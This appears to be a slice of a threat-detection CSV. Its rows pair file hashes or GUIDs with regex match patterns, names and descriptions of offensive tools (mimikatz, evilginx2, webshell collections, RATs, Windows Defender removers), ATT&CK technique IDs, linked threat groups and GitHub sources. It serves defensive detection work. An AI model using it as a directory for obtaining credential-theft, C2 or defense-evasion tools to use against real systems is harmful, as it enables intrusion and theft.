"*941adac8fd267646f962656ab473a044dde64d49a1f7cca2914eb8e70dccd5a1*",".{0,1000}941adac8fd267646f962656ab473a044dde64d49a1f7cca2914eb8e70dccd5a1.{0,1000}","offensive_tool_keyword","POC","CVE-2024-4367 poc exploitation","T1566","TA0042","N/A","N/A","Resource Development","https://github.com/rzte/pdf-exploit","1","0","#filehash","N/A","6","3","216","41","2024-07-19T03:04:41Z","2024-07-11T14:33:11Z","31305"
"*941e4b332bf0cbb3573b3936b114a41f1d416bb96ba13c333f6269074a8ae7f6*",".{0,1000}941e4b332bf0cbb3573b3936b114a41f1d416bb96ba13c333f6269074a8ae7f6.{0,1000}","offensive_tool_keyword","OperaPassView","OperaPassView is a small password recovery tool that decrypts the content of the Opera Web browser password file (wand.dat) and displays the list of all Web site passwords stored in this file","T1003 - T1555 - T1145","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/opera_password_recovery.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","31306"
"*9421b13f1c89ded77d1964b6e7032e300360063fc9d79b4afd432533038725d4*",".{0,1000}9421b13f1c89ded77d1964b6e7032e300360063fc9d79b4afd432533038725d4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31307"
"*942c4cbca688c82a6a6fad58d9b55ac261a8b73b74fc5e0484a86a1e7f8dca35*",".{0,1000}942c4cbca688c82a6a6fad58d9b55ac261a8b73b74fc5e0484a86a1e7f8dca35.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31310"
"*942eae7c332725392d235bb8d9e958f77e7d7b0374b2bd4e82d985a33204c176*",".{0,1000}942eae7c332725392d235bb8d9e958f77e7d7b0374b2bd4e82d985a33204c176.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31311"
"*9434E131-51CD-4FC6-9105-D73734DC5BA6*",".{0,1000}9434E131\-51CD\-4FC6\-9105\-D73734DC5BA6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31312"
"*9437e734cd6f37285d60b1d1c33de982d032cd7dea8a0349354c296e9ba46fbc*",".{0,1000}9437e734cd6f37285d60b1d1c33de982d032cd7dea8a0349354c296e9ba46fbc.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","31313"
"*9440cc0475d27f1b73944b69fc843ef2ef2e8fc407d1400502c49ee20291121b*",".{0,1000}9440cc0475d27f1b73944b69fc843ef2ef2e8fc407d1400502c49ee20291121b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31314"
"*94519aa5c41e7294ffc95b621e39097172fd0eeb9287d8678346fb80898516c3*",".{0,1000}94519aa5c41e7294ffc95b621e39097172fd0eeb9287d8678346fb80898516c3.{0,1000}","offensive_tool_keyword","Invoke-DNSteal","DNS Data Exfiltrator","T1071.004 - T1041 - T1048","TA0011 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/JoelGMSec/Invoke-DNSteal","1","0","#filehash","N/A","10","2","109","23","2023-07-17T11:26:19Z","2021-06-24T11:03:09Z","31315"
"*945dbfc7f7e3ba9e88aa677f30fd6fe9e266e7e88a2e5d4af03ee30b6fb3a5cd*",".{0,1000}945dbfc7f7e3ba9e88aa677f30fd6fe9e266e7e88a2e5d4af03ee30b6fb3a5cd.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31317"
"*945efb5ef7d46cf1e4f5383fb158ea5cd63d42214ea44abd73592f6ceeb6cf33*",".{0,1000}945efb5ef7d46cf1e4f5383fb158ea5cd63d42214ea44abd73592f6ceeb6cf33.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","31318"
"*946619C2-5959-4C0C-BC7C-1C27D825B042*",".{0,1000}946619C2\-5959\-4C0C\-BC7C\-1C27D825B042.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#GUIDproject","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","31319"
"*9466c85da5aa10d936e24ed74979d26231633e2d449386c4164bbcc4bbc313aa*",".{0,1000}9466c85da5aa10d936e24ed74979d26231633e2d449386c4164bbcc4bbc313aa.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31320"
"*946D24E4-201B-4D51-AF9A-3190266E0E1B*",".{0,1000}946D24E4\-201B\-4D51\-AF9A\-3190266E0E1B.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","#GUIDproject","N/A","10","10","260","47","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z","31322"
"*946f91872edc2694cd84df5a147df89583d29ed991e8e80de8ee219ea7635528*",".{0,1000}946f91872edc2694cd84df5a147df89583d29ed991e8e80de8ee219ea7635528.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31323"
"*94795fd89366e01bd6ce6471ff27c3782e2e16377a848426cf0b2e6baee9449b*",".{0,1000}94795fd89366e01bd6ce6471ff27c3782e2e16377a848426cf0b2e6baee9449b.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31325"
"*94795fd89366e01bd6ce6471ff27c3782e2e16377a848426cf0b2e6baee9449b*",".{0,1000}94795fd89366e01bd6ce6471ff27c3782e2e16377a848426cf0b2e6baee9449b.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31326"
"*947d0aebbfdfa05a00d1cf8e087b2f93a411bac74e125da4abfaa2e6ad3f8826*",".{0,1000}947d0aebbfdfa05a00d1cf8e087b2f93a411bac74e125da4abfaa2e6ad3f8826.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31327"
"*9484ea212c59a9ada48f9f08204448eaf013891b7b722f9d111f4346f7f17a4c*",".{0,1000}9484ea212c59a9ada48f9f08204448eaf013891b7b722f9d111f4346f7f17a4c.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","31328"
"*94862eccf19a77022f230e9e6817b4b20f55c1e5e86d3a910595ec7235a2846d*",".{0,1000}94862eccf19a77022f230e9e6817b4b20f55c1e5e86d3a910595ec7235a2846d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31329"
"*948f609d447e622613e2b02500ec333867849aee711dcb146be75ddee92dd02e*",".{0,1000}948f609d447e622613e2b02500ec333867849aee711dcb146be75ddee92dd02e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31330"
"*94a12554419e378df4acc76c0725d141738ecf1f991c74445d1e23c655278747*",".{0,1000}94a12554419e378df4acc76c0725d141738ecf1f991c74445d1e23c655278747.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31332"
"*94aaedf468e4187388ab53a01bfdd820a47ebc3a78e2404285c040ccfea9161f*",".{0,1000}94aaedf468e4187388ab53a01bfdd820a47ebc3a78e2404285c040ccfea9161f.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","31334"
"*94AEDCE4-D4A2-45DB-B98E-860EE6BE8385*",".{0,1000}94AEDCE4\-D4A2\-45DB\-B98E\-860EE6BE8385.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#GUIDproject","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","31336"
"*94b33b49ee9fd258173cdc1a31c1f330403d6dc78540bf7258e8c9b6763334f8*",".{0,1000}94b33b49ee9fd258173cdc1a31c1f330403d6dc78540bf7258e8c9b6763334f8.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","31337"
"*94bd506457e76c837592396e349c0d2da7f783ed0d1e3f083457b4ac013286cb*",".{0,1000}94bd506457e76c837592396e349c0d2da7f783ed0d1e3f083457b4ac013286cb.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","31338"
"*94bdfe850be6641545e52c3b0a3cbe2cb753145d02004ce8211b8468902d88ba*",".{0,1000}94bdfe850be6641545e52c3b0a3cbe2cb753145d02004ce8211b8468902d88ba.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","31339"
"*94beb306747153d234f7da1d2c996cab68e19620e87d9f348979886910eb09cb*",".{0,1000}94beb306747153d234f7da1d2c996cab68e19620e87d9f348979886910eb09cb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31340"
"*94c1bf751c218c05c084d309a18c98a54385abc6b41b03b456ef0747e5abd8e9*",".{0,1000}94c1bf751c218c05c084d309a18c98a54385abc6b41b03b456ef0747e5abd8e9.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","31341"
"*94c1e9fde90bb271016a5a6bc05f6cfc8caa1acc18336aa864de5431ac52c7a4*",".{0,1000}94c1e9fde90bb271016a5a6bc05f6cfc8caa1acc18336aa864de5431ac52c7a4.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","31342"
"*94c7153749f9d9e3d12da8ff2201927599003808cee82316e9bc632387aeb0cc*",".{0,1000}94c7153749f9d9e3d12da8ff2201927599003808cee82316e9bc632387aeb0cc.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","31345"
"*94ca09b07f92e22393a2b6afc541bdd82cb351ab6eba92cc312fde149aac0606*",".{0,1000}94ca09b07f92e22393a2b6afc541bdd82cb351ab6eba92cc312fde149aac0606.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31346"
"*94cae63dcbabb71c5dd43f55fd09caeffdcd7628a02a112fb3cba36698ef72bc*",".{0,1000}94cae63dcbabb71c5dd43f55fd09caeffdcd7628a02a112fb3cba36698ef72bc.{0,1000}","offensive_tool_keyword","gsecdump","credential dumper used to obtain password hashes and LSA secrets from Windows operating systems","T1003.001 - T1003.002 - T1555.003 - T1555.001","TA0006 - TA0008","N/A","APT1 - PittyTiger - Tonto Team - BRONZE BUTLER - Threat Group-3390 - APT22 - APT24 - APT27 - Night Dragon - Tick","Credential Access","https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","31348"
"*94d8893a6c819e092afee3334fb7f2263704b30a1139fae76a67d52d4a4db801*",".{0,1000}94d8893a6c819e092afee3334fb7f2263704b30a1139fae76a67d52d4a4db801.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","31351"
"*94dc145b517036213443d4057d400296d40ffdcd50ba63f5304796060790c8a3*",".{0,1000}94dc145b517036213443d4057d400296d40ffdcd50ba63f5304796060790c8a3.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","#filehash","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","31352"
"*94dd1b6c6dc713a934516955f05b43b6a7c82b008788312e6f2fe56ed12c9094*",".{0,1000}94dd1b6c6dc713a934516955f05b43b6a7c82b008788312e6f2fe56ed12c9094.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","31353"
"*94e25cf9677638da8ddfd84a2c15783e894de90331ed06e9786b1a46df1915fb*",".{0,1000}94e25cf9677638da8ddfd84a2c15783e894de90331ed06e9786b1a46df1915fb.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","31355"
"*94eada8ec8949a866792d385ca5f5b23e314c310e67035f576604d9ef9bf9a96*",".{0,1000}94eada8ec8949a866792d385ca5f5b23e314c310e67035f576604d9ef9bf9a96.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31358"
"*94ebb5f2aef9398a08a40e352a09bf6f83e01c0a666e3adb017636af3e0bee12*",".{0,1000}94ebb5f2aef9398a08a40e352a09bf6f83e01c0a666e3adb017636af3e0bee12.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","31359"
"*94f363f8d5a0c96bd72906bf5cef04d1966ad6c1fc99c80484ad89e10b20b8db*",".{0,1000}94f363f8d5a0c96bd72906bf5cef04d1966ad6c1fc99c80484ad89e10b20b8db.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","31360"
"*94f93f559533afd33b026849ee730d3c360faa4e9dcf7241d3d3132802736ee0*",".{0,1000}94f93f559533afd33b026849ee730d3c360faa4e9dcf7241d3d3132802736ee0.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","31361"
"*94fcbb0aadcaaeae36a043eee19005e3e6ae2c991a389291fef7d4ecbe68aeb5*",".{0,1000}94fcbb0aadcaaeae36a043eee19005e3e6ae2c991a389291fef7d4ecbe68aeb5.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","0","#filehash","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","31362"
"*950ba7173a1c869400d8b9099a42ef76c13546da5321f69da77819899b6e1d23*",".{0,1000}950ba7173a1c869400d8b9099a42ef76c13546da5321f69da77819899b6e1d23.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31367"
"*950bb21485106b135bbe1e28b8b7f74652cadeb9ae8c68342f0ee8c91ce8306c*",".{0,1000}950bb21485106b135bbe1e28b8b7f74652cadeb9ae8c68342f0ee8c91ce8306c.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","#filehash","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","31368"
"*950c01ef35e9f68b4d8d9d9ea2c642fc6202b44ecabc19591dd7d3f852d02bcf*",".{0,1000}950c01ef35e9f68b4d8d9d9ea2c642fc6202b44ecabc19591dd7d3f852d02bcf.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","31369"
